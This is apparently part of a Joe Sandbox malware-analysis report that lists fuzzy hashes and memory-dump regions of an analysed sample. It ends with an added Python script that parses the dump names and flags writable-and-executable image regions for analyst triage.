                                                                        • Opcode Fuzzy Hash: a9fc48a3079ea9eaf948049d1e27166f8ea462e22e9ba9eed5f27efa13bbb212
                                                                        • Instruction Fuzzy Hash: 78716D33F5559047CB2E897D6C122B9A99B4BD233472EC37B9D75DB7D0CA398D014240
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb109b078ffc4c50cf3798cb3fbfb678e9a7f5e468fda50e04b6732159d27c6d
                                                                        • Instruction ID: c246740f2d3d86e2ab8a004cd1f5cb887d67fec5991262ab61c8966fdef866d2
                                                                        • Opcode Fuzzy Hash: bb109b078ffc4c50cf3798cb3fbfb678e9a7f5e468fda50e04b6732159d27c6d
                                                                        • Instruction Fuzzy Hash: 927128B260D3049FE7046E29ED8577AFBE5EF84320F1A893DE6C497784E93858418787
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12b0b5275cb021a73a88810f61ddfcde146a4350d42400f557636c2d14399154
                                                                        • Instruction ID: f99b28e4d39d5fb5aea34e216cfe0c535e2dc5e92eb826ccba4216c30aefcccb
                                                                        • Opcode Fuzzy Hash: 12b0b5275cb021a73a88810f61ddfcde146a4350d42400f557636c2d14399154
                                                                        • Instruction Fuzzy Hash: 985167F26083089BE3486E68EC8677AB7D5EB90310F16893DD7C6477C4ED7959008746
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4cc2040aa7a1291d02c749a87f91f379b2171f107d8cf14ecedc7a1d1eadca11
                                                                        • Instruction ID: 6148146526e18417e7b819e24a5ba48d7838cf4e2fb9e9e010367634a27fa640
                                                                        • Opcode Fuzzy Hash: 4cc2040aa7a1291d02c749a87f91f379b2171f107d8cf14ecedc7a1d1eadca11
                                                                        • Instruction Fuzzy Hash: 6D511637A1A6D08BC72E4D7C4C517A96A5B4BD6330B3F836ED9B4CB7D1C9268C028390
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b4c9e11a8d89d9ab0441aac9f84b5abc412f0474d3f63e764a47b7043cccce39
                                                                        • Instruction ID: 911a260443fb924df50e0672e20f6140e64fa3b5691e17847ca126a9c84a90f8
                                                                        • Opcode Fuzzy Hash: b4c9e11a8d89d9ab0441aac9f84b5abc412f0474d3f63e764a47b7043cccce39
                                                                        • Instruction Fuzzy Hash: 47514CF3E08210DFE3446E28EC8637AB7D5EB94320F1A853DDAC4D7784EA7948058687
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55a0f8085dff992ca73a046a15923a35ffcee2f139a773c0d967a45c25a16dfd
                                                                        • Instruction ID: 5088cc3454a0ee26dd2d4646f21adde750f8170c9ab764a369d74cc06f3b2b98
                                                                        • Opcode Fuzzy Hash: 55a0f8085dff992ca73a046a15923a35ffcee2f139a773c0d967a45c25a16dfd
                                                                        • Instruction Fuzzy Hash: 884154F3E083145BE3046D6DEC85776B799EBD4320F2A463EDE84D3B84E8B90C064692
Memory Dump Source
• Source File: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c90834b92118450b3a76e56f2a04f6c687bfbf2e19554458927ac070d454375c
• Instruction ID: f04dd20dfdb10b992f2d8f45df6a8ddf0282e6273d2b92dc8a2cea14aa42670c
• Opcode Fuzzy Hash: c90834b92118450b3a76e56f2a04f6c687bfbf2e19554458927ac070d454375c
• Instruction Fuzzy Hash: 9841A4F250C318AFE315BF28EC867AAFBE5EF14664F06092DD6C483600F675A8148687
Memory Dump Source
• Source File: 00000000.00000003.1600086581.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Offset: 0106C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_106c000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 028b42b27217239f80afe40b337d43dc6f96bc2b5354d6296e8132c364586080
• Instruction ID: ba76a33f50fa6524481c64ffb5c29ebb7b8f8f8aeaeb60ea18a15819fd4097f1
• Opcode Fuzzy Hash: 028b42b27217239f80afe40b337d43dc6f96bc2b5354d6296e8132c364586080
• Instruction Fuzzy Hash: 89410C3500E3D28FC717CF34CA96692BFA6BF4321430889C9E4C19F163C361691ACBA2
Memory Dump Source
• Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7aa1031f3709debd115c5f9a2c588c994cfb49d1045608c41eaffa36e0fb6b45
• Instruction ID: 02df89d0089c927b5bcf028dc90d3be41798266bfd816d4dd1104f5c8d77ba55
• Opcode Fuzzy Hash: 7aa1031f3709debd115c5f9a2c588c994cfb49d1045608c41eaffa36e0fb6b45
• Instruction Fuzzy Hash: E88140B890A3D4CBC376CF16D98869BBBE5BB99309F504A1D988C5B3D0CBB01445CF56
Memory Dump Source
• Source File: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ad759c7e6d3289f3fe426305097b506dea8d4554d00fbb5bcc1bf24f8e5e75cd
• Instruction ID: 55f31b7077feb4052b6746b4ed43262ff89f4242fd6d9d372c4e6dc316c1b78c
• Opcode Fuzzy Hash: ad759c7e6d3289f3fe426305097b506dea8d4554d00fbb5bcc1bf24f8e5e75cd
• Instruction Fuzzy Hash: BE319CF291C7049FD355AF69D8817BAFBE8EFA5311F1A482DE6C4C3310E63588418A97
Memory Dump Source
• Source File: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 37127249b1c6385cd99ac69ed6b852c02af13d8e497f8de661fc398b1a33a057
• Instruction ID: cc3ca3a0d75b8d3042b65073222318bf68a6db31dde7c89a36b3901762da1180
• Opcode Fuzzy Hash: 37127249b1c6385cd99ac69ed6b852c02af13d8e497f8de661fc398b1a33a057
• Instruction Fuzzy Hash: 643119B251C714AFE309BF19D8816BAFBE9EF58350F02091DEAC5D3600E73158808B97
Memory Dump Source
• Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 425888b6ba5c7d4f6989c91f5e5009324c324c578bff5a8fa33fc92f5be39e14
• Instruction ID: aa2710c97fa71164e90681b3f739f58e3179cc05a3050584cc383f44f0015f83
• Opcode Fuzzy Hash: 425888b6ba5c7d4f6989c91f5e5009324c324c578bff5a8fa33fc92f5be39e14
• Instruction Fuzzy Hash: 0611C437B2566147F362CE6EDCD4B17635EEBCA310B1B0134EE41D7242C626E801D150
Memory Dump Source
• Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
• Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3a0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b934e473b4a7e244983ba6835cc739190162193cac2e9f435ff75061096f2a6
• Instruction ID: f14d4bdaa352f4c5b574097fb7aadc90d5d5584e05e1677395be356186683c5c
• Opcode Fuzzy Hash: 2b934e473b4a7e244983ba6835cc739190162193cac2e9f435ff75061096f2a6
• Instruction Fuzzy Hash: F6B09290A042487F45249D0A8C85E7BB6BE92CB640F106109A408A32648650EC0482F9
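The dump names repeated in every "Memory Dump Source" entry above carry the base address and the page protection of each dumped region, and that is enough to decide which dumps to open first. The script below is an added example, not Joe Sandbox code: it parses those names and flags the image-backed regions that are writable and executable at the same time. The field layout (process, sequence, dump id, base address, protection, type, with two fields left uninterpreted) is an assumption inferred from the names on this page, not taken from Joe Sandbox documentation; the protection and type values themselves are the documented Win32 PAGE_* and MEM_* constants, and every value on the page (0x04, 0x40, 0x80, 0x20000, 0x1000000) matches one of them.

```python
"""Triage the .sdmp memory-dump names listed in this report.

Assumed name layout (inferred from the names on this page, not from Joe Sandbox
documentation; fields 6 and 8 are not interpreted):

    <proc>.<seq>.<dump id>.<base address>.<protect>.<field6>.<type>.<field8>.sdmp
"""
import re
from dataclasses import dataclass

# Documented Win32 page-protection constants (winnt.h); every value on the page
# (0x04, 0x40, 0x80) is one of these, which is why field 5 is read this way.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
# Documented MEMORY_BASIC_INFORMATION.Type values; the page shows 0x20000 and 0x1000000.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_IMAGE = 0x1000000

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\."
    r"(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process: int
    sequence: int
    dump_id: int
    base: int
    protect: int    # raw field 5
    mem_type: int   # raw field 7

    @property
    def protect_name(self) -> str:
        low = self.protect & 0xFF   # high bits would be PAGE_GUARD / PAGE_NOCACHE modifiers
        return PAGE_PROTECT.get(low, f"0x{low:02X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def is_wx(self) -> bool:
        """Writable and executable at once (READWRITE or WRITECOPY with execute)."""
        low = self.protect & 0xFF
        return low in EXECUTABLE and low in WRITABLE

    def summary(self) -> str:
        return f"{self.base:08X} {self.protect_name} {self.type_name}"


def parse_sdmp(name: str) -> DumpRegion:
    """Parse one dump name; raises ValueError if it does not fit the assumed layout."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(
        process=int(m["proc"], 16), sequence=int(m["seq"], 16),
        dump_id=int(m["dump"]), base=int(m["base"], 16),
        protect=int(m["protect"], 16), mem_type=int(m["type"], 16),
    )


def wx_image_regions(names):
    """Dumps that are image-backed (MEM_IMAGE) and writable+executable.

    A normally built PE maps code RX and data RW, so W+X pages inside the image
    mapping are the first ones to open: that is where rewritten or unpacked code
    tends to live.  Private RW memory (heap, stack) is deliberately not flagged.
    """
    return [r for r in map(parse_sdmp, names) if r.mem_type == MEM_IMAGE and r.is_wx]


# The dump names from the listing above: the thirteen image dumps of the module
# at 003A0000 and the private-memory dump at 0106C000.
REPORT_DUMPS = [
    "00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000003.1600086581.000000000106C000.00000004.00000020.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for region in map(parse_sdmp, REPORT_DUMPS):
        print(("WX " if region.is_wx else "   ") + region.summary())
```

Run against the names above, only the header page at 003A0000, the page at 003F7000 and the private region at 0106C000 come back as plain RW; the remaining eleven image dumps are writable and executable, so those are the ones to load into the disassembler first. PAGE_EXECUTE_WRITECOPY is counted as W+X on purpose: it is what the loader gives a section whose header already asks for write and execute, and it is just as unusual in a benign build as PAGE_EXECUTE_READWRITE.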